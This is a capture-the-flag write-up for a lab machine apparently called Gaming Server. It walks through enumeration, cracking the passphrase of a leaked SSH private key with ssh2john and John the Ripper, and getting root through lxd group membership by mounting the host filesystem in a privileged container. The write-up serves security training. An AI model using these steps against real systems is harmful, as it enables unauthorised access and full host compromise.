Let’s start with a port scan to see what ports are open
So we have an ssh server running on port 22 and an Apache web server running on port 80. The name of the web server is “House of danak”. The operating system is Ubuntu.
Looking through the source code we find a comment, this gives us a possible username “john”
Navigating to “DRAAGAN LORE” we are presented with an “Upload” button, which takes us to the following screen:
Here we have a list of file which we will download using wget for further enumeration.
Dict.lst: This appears to be either a list of possible directories or passwords, we will copy and paste into a file using Vi.
Manifesto.txt: This appears to be a text file containing the manifesto of a hacker.
Meme.jpg: A jpg file, this may contain steganography; however a quick check using strings, Exiftool and Binwalk did not find anything. There maybe a hidden information we can extract with Steghide, but if there is we need a Passphrase. Running Stegcracker with the rockyou wordlist also did not find a Passphrase.
Searching for hidden directories with Gobuster:
Using both the Dict.lst and the common Dirbuster directory list I searched for hidden directories using Gobuster.
We find the /uploads which we have already explored and a new directory called /*****. Directory obscured
/******:
Downloading the SecretKey, we find an RSA private key, I will chmod 600 this key for future use with the ssh server:
Could we use this public key with user john to access the ssh server:
‘ssh -i secretKey john@10.10.218.145
Unfortunately we need the password for the key, so time to bruteforce the password from the id_rsa private key. We can do this using John the Ripper, but first we will need to convert the public id_rsa key to a format John can work with using ssh2john.py.
python /usr/share/ssh2john.py secretKey > id_rsa.hash
We can now use John to bruteforce the password. To start with I will use the dict.lst file we downloaded earlier, if this does not work, we can move on the the rockyou wordlist.
john --wordlist=dict.lst id_rsa.hash
We have our password and can now attempt to login to the ssh server as james.
ssh -i secretkey john@10.10.218.145
And we are in as user john. From here we can get the user.txt flag from john’s /home directory.
Privesc to Root:
The first thing is that the box tags for Gaming Server reference lxd, so my initial assumption is that we are in a docker and we need to break out. Having previously done a similar box where the privesc involved breaking out of a lxd docker, I have a good idea of how to do this.
Checking id we can see that John is a member of the lxd group, so without any further enumeration I will start a privesc on lxd.
To start with we need to download the lxd-alpine image builder to our local machine:
We can either download this from the github repository or use git clone from the command line. We will use git clone:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd into the “lxd-alpine-builder” directory and run the “build-alpine” with the following command.
sudo ./build-alpine -a i686
When you ls the directory you will see that you have the image file with the .gz extension. Next we need to setup a simple http server and upload to the image file to the remote machine.
We can use wget on the remote machine to upload the .qz file
Once uploaded we next need to import the image into lxd.
lxc image import alpint-v3.12-i868-20200831_1748.tar.gz --alias alpine
If we use the command, “lxc image list”, we can see that the image is now available on lxd:
We now need to create a machine from the image, this can be done by running the following command:
lxc init alpine privesc -c security.privileged=true
Where alpine is the image file and privesc is what I am calling the machine.
If we use the command “lxc list”,, we can now see that the machine with the name privesc.
Next we need to add a hard drive to the machine, the privesc technique in this case looks to have the whole host mounted in the /mnt/root and thus you have root access. We can achieve this with the following command:
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
As noted above the machine privesc is currently stopped, so we will need to start it with the following command:
lxc start privesc
To exploit the machine, we run the following command:
lxc exec privesc /bin/sh
All we have to do now is grab the root.txt flag and we are done:
A great box and it has been some time since I done an lxc privesc. Thank you to SuitGuy for developing this box.
